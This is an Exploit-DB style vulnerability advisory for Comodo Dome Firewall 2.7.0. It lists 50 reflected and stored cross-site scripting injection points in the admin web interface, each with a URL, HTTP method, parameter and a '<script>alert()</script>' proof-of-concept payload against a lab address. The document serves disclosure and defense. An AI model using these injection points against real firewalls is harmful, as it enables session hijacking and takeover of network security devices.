Comodo Dome Firewall 2.7.0 | Cross-Site Scripting

vendor:
Dome Firewall
by:
Ozer Goker
5.5
CVSS
MEDIUM
Cross-Site Scripting
CWE
Product Name: Dome Firewall
Affected Version From: 2.7.2000
Affected Version To: 2.7.2000
Patch Exists: NO
Related CWE:
CPE: comodo:dome_firewall:2.7.0
Metasploit:
Other Scripts:
Platforms Tested:
2019
Comodo Dome Firewall 2.7.0 | Cross-Site Scripting

This exploit allows an attacker to inject malicious scripts into the Comodo Dome Firewall software, specifically in the 'username', 'comment', and 'admin_name' parameters. The payload used in the exploit triggers an alert pop-up with the specified message.
Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and implement proper output encoding. Additionally, regular security updates and patches should be applied to the Comodo Dome Firewall software.
Source
Exploit-DB raw data:

##################################################################################################################################
# Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting
# Date: 18.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://cdome.comodo.com/firewall/
# Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278
# Version: 2.7.0
##################################################################################################################################

Introduction

Comodo Dome Firewall (DFW) provides comprehensive security for enterprise
networks. The firewall software can be installed on a physical system or a
virtual machine.

Dome Firewall simplifies the overall management of network security by
delivering a single interface through which administrators can control
firewall policy, antivirus, intrusion prevention, website filtering,
traffic monitoring, VPN and proxy servers. Dome Firewall also features
highly configurable notifications, in-depth reporting and an informative
dashboard which offers a panoramic view of all major settings and network
events.

#################################################################################

XSS details: Reflected & Stored

#################################################################################


XSS1 | Reflected

URL
https://192.168.2.200:10443/korugan/login

METHOD
Post

PARAMETER
username

PAYLOAD
"><script>alert(1)</script>


#################################################################################



XSS2 | Stored

URL
https://192.168.2.200:10443/korugan/admin_profiles

METHOD
Post

PARAMETER
comment

PAYLOAD
<script>alert(2)</script>

#################################################################################


XSS3 | Stored

URL
https://192.168.2.200:10443/korugan/admins

METHOD
Post

PARAMETER
admin_name

PAYLOAD
<script>alert(3)</script>


#################################################################################


XSS4 | Stored

URL
https://192.168.2.200:10443/korugan/admins

METHOD
Post

PARAMETER
name

PAYLOAD
<script>alert(4)</script>


#################################################################################


XSS5 | Stored

URL
https://192.168.2.200:10443/korugan/admins

METHOD
Post

PARAMETER
surname

PAYLOAD
<script>alert(5)</script>


#################################################################################


XSS6 | Stored

URL
https://192.168.2.200:10443/korugan/license_activation

METHOD
Post

PARAMETER
newLicense

PAYLOAD
<script>alert(6)</script>


#################################################################################


XSS7 | Reflected

URL
https://192.168.2.200:10443/korugan/cmclient

METHOD
Post

PARAMETER
organization

PAYLOAD
"><script>alert(7)</script>


#################################################################################

XSS8 | Reflected

URL
https://192.168.2.200:10443/korugan/backupschedule

METHOD
Post

PARAMETER
BACKUP_RCPTTO

PAYLOAD
<script>alert(8)</script>


#################################################################################


XSS9 | Reflected

URL
https://192.168.2.200:10443/korugan/netwizard2

METHOD
Post

PARAMETER
netmask_addr

PAYLOAD
<script>alert(9)</script>


#################################################################################


XSS10 | Reflected

URL
https://192.168.2.200:10443/korugan/routing

METHOD
Post

PARAMETER
destination

PAYLOAD
<script>alert(10)</script>


#################################################################################


XSS11 | Reflected

URL
https://192.168.2.200:10443/korugan/policy_routing#createrule

METHOD
Post

PARAMETER
source

PAYLOAD
<script>alert(11)</script>


#################################################################################


XSS12 | Reflected

URL
https://192.168.2.200:10443/korugan/policy_routing#createrule

METHOD
Post

PARAMETER
destination

PAYLOAD
<script>alert(12)</script>


#################################################################################


XSS13 | Reflected

URL
https://192.168.2.200:10443/korugan/dhcp

METHOD
Post

PARAMETER
GATEWAY_GREEN

PAYLOAD
<script>alert(13)</script>

#################################################################################


XSS14 | Reflected

URL
https://192.168.2.200:10443/korugan/time

METHOD
Post

PARAMETER
NTP_SERVER_LIST

PAYLOAD
<script>alert(14)</script>


#################################################################################


XSS15 | Reflected

URL
https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop

METHOD
Get

PARAMETER
ID

PAYLOAD
<script>alert(15)</script>


#################################################################################


XSS16 | Reflected

URL
https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off

METHOD
Get

PARAMETER
ID

PAYLOAD
<script>alert(16)</script>


#################################################################################


XSS17 | Reflected

URL
https://192.168.2.200:10443/korugan/hotspot_permanent_users

METHOD
Post

PARAMETER
MACADDRESSES

PAYLOAD
<script>alert(17)</script>


#################################################################################


XSS18 | Reflected

URL
https://192.168.2.200:10443/manage/qos/devices/

METHOD
Post

PARAMETER
device

PAYLOAD
<script>alert(18)</script>


#################################################################################


XSS19 | Reflected

URL
https://192.168.2.200:10443/manage/qos/rules/

METHOD
Post

PARAMETER
protocol

PAYLOAD
<script>alert(19)</script>


#################################################################################


XSS20 | Reflected

URL
https://192.168.2.200:10443/korugan/fwgroups

METHOD
Post

PARAMETER
FWADDRESSES

PAYLOAD
<script>alert(20)</script>


#################################################################################


XSS21 | Stored

URL
https://192.168.2.200:10443/korugan/schedule

METHOD
Post

PARAMETER
SCHNAME

PAYLOAD
<script>alert(21)</script>


#################################################################################


XSS22 | Reflected

URL
https://192.168.2.200:10443/korugan/snat

METHOD
Post

PARAMETER
port

PAYLOAD
<script>alert(22)</script>


#################################################################################


XSS23 | Reflected

URL
https://192.168.2.200:10443/korugan/snat

METHOD
Post

PARAMETER
snat_to_ip

PAYLOAD
<script>alert(23)</script>


#################################################################################


XSS24 | Reflected

URL
https://192.168.2.200:10443/korugan/policyfw

METHOD
Post

PARAMETER
mac

PAYLOAD
<script>alert(24)</script>

#################################################################################


XSS25 | Reflected

URL
https://192.168.2.200:10443/korugan/policyfw

METHOD
Post

PARAMETER
target

PAYLOAD
<script>alert(25)</script>


#################################################################################


XSS26 | Stored

URL
https://192.168.2.200:10443/korugan/policyfw

METHOD
Post

PARAMETER
remark

PAYLOAD
<script>alert(26)</script>


#################################################################################


XSS27 | Reflected

URL
https://192.168.2.200:10443/korugan/vpnfw

METHOD
Post

PARAMETER
target

PAYLOAD
<script>alert(27)</script>


#################################################################################



XSS28 | Stored

URL
https://192.168.2.200:10443/korugan/vpnfw

METHOD
Post

PARAMETER
remark

PAYLOAD
<script>alert(28)</script>


#################################################################################


XSS29 | Reflected

URL
https://192.168.2.200:10443/korugan/proxyconfig

METHOD
Post

PARAMETER
PROXY_PORT

PAYLOAD
<script>alert(29)</script>


#################################################################################


XSS30 | Reflected

URL
https://192.168.2.200:10443/korugan/proxyconfig

METHOD
Post

PARAMETER
VISIBLE_HOSTNAME

PAYLOAD
<script>alert(30)</script>


#################################################################################


XSS31 | Reflected

URL
https://192.168.2.200:10443/korugan/proxyconfig

METHOD
Post

PARAMETER
ADMIN_MAIL_ADDRESS

PAYLOAD
<script>alert(31)</script>


#################################################################################


XSS32 | Reflected

URL
https://192.168.2.200:10443/korugan/proxyconfig

METHOD
Post

PARAMETER
CACHE_MEM

PAYLOAD
<script>alert(32)</script>


#################################################################################


XSS33 | Reflected

URL
https://192.168.2.200:10443/korugan/proxyconfig

METHOD
Post

PARAMETER
MAX_SIZE

PAYLOAD
<script>alert(33)</script>


#################################################################################


XSS34 | Reflected

URL
https://192.168.2.200:10443/korugan/proxyconfig

METHOD
Post

PARAMETER
MIN_SIZE

PAYLOAD
<script>alert(34)</script>


#################################################################################


XSS35 | Reflected

URL
https://192.168.2.200:10443/korugan/proxyconfig

METHOD
Post

PARAMETER
DST_NOCACHE

PAYLOAD
<script>alert(35)</script>


#################################################################################


XSS36 | Reflected

URL
https://192.168.2.200:10443/korugan/https_exceptions

METHOD
Post

PARAMETER
EXCEPTIONSITELIST

PAYLOAD
<script>alert(36)</script>


#################################################################################


XSS37 | Reflected

URL
https://192.168.2.200:10443/korugan/smtpconfig

METHOD
Post

PARAMETER
VIRUS_ADMIN

PAYLOAD
<script>alert(37)</script>


#################################################################################


XSS38 | Reflected

URL
https://192.168.2.200:10443/korugan/dnsmasq

METHOD
Post

PARAMETER
TRANSPARENT_SOURCE_BYPASS

PAYLOAD
<script>alert(38)</script>


#################################################################################


XSS39 | Reflected

URL
https://192.168.2.200:10443/korugan/dnsmasq

METHOD
Post

PARAMETER
TRANSPARENT_DESTINATION_BYPASS

PAYLOAD
<script>alert(39)</script>


#################################################################################


XSS40 | Reflected

URL
https://192.168.2.200:10443/korugan/antispyware

METHOD
Post

PARAMETER
DNSMASQ_WHITELIST

PAYLOAD
<script>alert(40)</script>


#################################################################################


XSS41 | Reflected

URL
https://192.168.2.200:10443/korugan/antispyware

METHOD
Post

PARAMETER
DNSMASQ_BLACKLIST

PAYLOAD
<script>alert(41)</script>


#################################################################################


XSS42 | Reflected

URL
https://192.168.2.200:10443/korugan/openvpn_users

METHOD
Post

PARAMETER
username

PAYLOAD
<script>alert(42)</script>


#################################################################################


XSS43 | Reflected

URL
https://192.168.2.200:10443/korugan/openvpn_users

METHOD
Post

PARAMETER
remotenets

PAYLOAD
<script>alert(43)</script>


#################################################################################



XSS44 | Reflected

URL
https://192.168.2.200:10443/korugan/openvpn_users

METHOD
Post

PARAMETER
explicitroutes

PAYLOAD
<script>alert(44)</script>


#################################################################################



XSS45 | Reflected

URL
https://192.168.2.200:10443/korugan/openvpn_users

METHOD
Post

PARAMETER
static_ip

PAYLOAD
<script>alert(45)</script>


#################################################################################


XSS46 | Reflected

URL
https://192.168.2.200:10443/korugan/openvpn_users

METHOD
Post

PARAMETER
custom_dns

PAYLOAD
<script>alert(46)</script>


#################################################################################


XSS47 | Reflected

URL
https://192.168.2.200:10443/korugan/openvpn_users

METHOD
Post

PARAMETER
custom_domain

PAYLOAD
<script>alert(47)</script>


#################################################################################


XSS48 | Reflected

URL
https://192.168.2.200:10443/korugan/openvpn_advanced

METHOD
Post

PARAMETER
GLOBAL_NETWORKS

PAYLOAD
<script>alert(48)</script>


#################################################################################



XSS49 | Reflected

URL
https://192.168.2.200:10443/korugan/openvpn_advanced

METHOD
Post

PARAMETER
GLOBAL_DNS

PAYLOAD
<script>alert(49)</script>


#################################################################################


XSS50 | Reflected

URL
https://192.168.2.200:10443/korugan/vpn_users

METHOD
Post

PARAMETER
username

PAYLOAD
<script>alert(50)</script>


#################################################################################